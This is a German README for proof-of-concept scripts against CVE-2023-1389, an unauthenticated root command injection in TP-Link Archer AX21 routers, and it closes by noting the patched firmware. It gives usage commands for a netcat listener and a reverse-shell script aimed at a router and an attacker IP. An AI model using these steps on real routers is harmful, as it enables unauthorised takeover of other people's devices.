Proof-of-Concept-Skripte für CVE-2023-1389, eine nicht authentifizierte Befehlsinjektion in TP-Link Archer AX21, die Dateiübertragungs- und Reverse-Shell-Funktionen bereitstellt.
CVE-2023–1389 ist eine nicht authentifizierte Befehlsinjizierungsschwachstelle im TP-Link Archer AX21 WLAN-Router. Ein Callback im Parameter country verwendet die Funktion popen(), die als root ausgeführt wird, sodass der Angreifer beliebige Werte über GET- oder POST-Anfragen an die Admin-Oberfläche injizieren kann, ohne dass eine Authentifizierung erforderlich ist. Weitere Details zur Schwachstelle finden Sie hier.
Dies sind ein paar Proof-of-Concepts, die ich bei der Untersuchung der Befehlsinjektion erstellt habe. Archer-file-transfer.py war die erste Iteration und ist ziemlich umständlich in der Art und Weise, wie sie die Interaktion erreicht. Archer-rev-shell.py gibt Ihnen eine einfache Netcat-Reverse-Shell und ist wahrscheinlich die, nach der Sie suchen. Wenn Sie mehr über die Entwicklung dieser Skripte erfahren möchten, können Sie den Beitrag hier lesen.
In einem Terminalfenster:
nc your_IP listener_port
In einem zweiten Terminalfenster:
python3 archer-rev-shell.py -r router_IP -a your_IP -p listner_port
TP-Link hat die Firmware-Version 1.1.4 Build 20230219 veröffentlicht, die das Problem durch Entfernen des anfälligen Callbacks behebt. Ein Update Ihres Routers auf die neueste Firmware sollte Ihr Gerät schützen.
Ich werde diese PoCs wahrscheinlich nicht weiter pflegen. Beide sind recht einfach und sollten bei Bedarf leicht modifiziert werden können.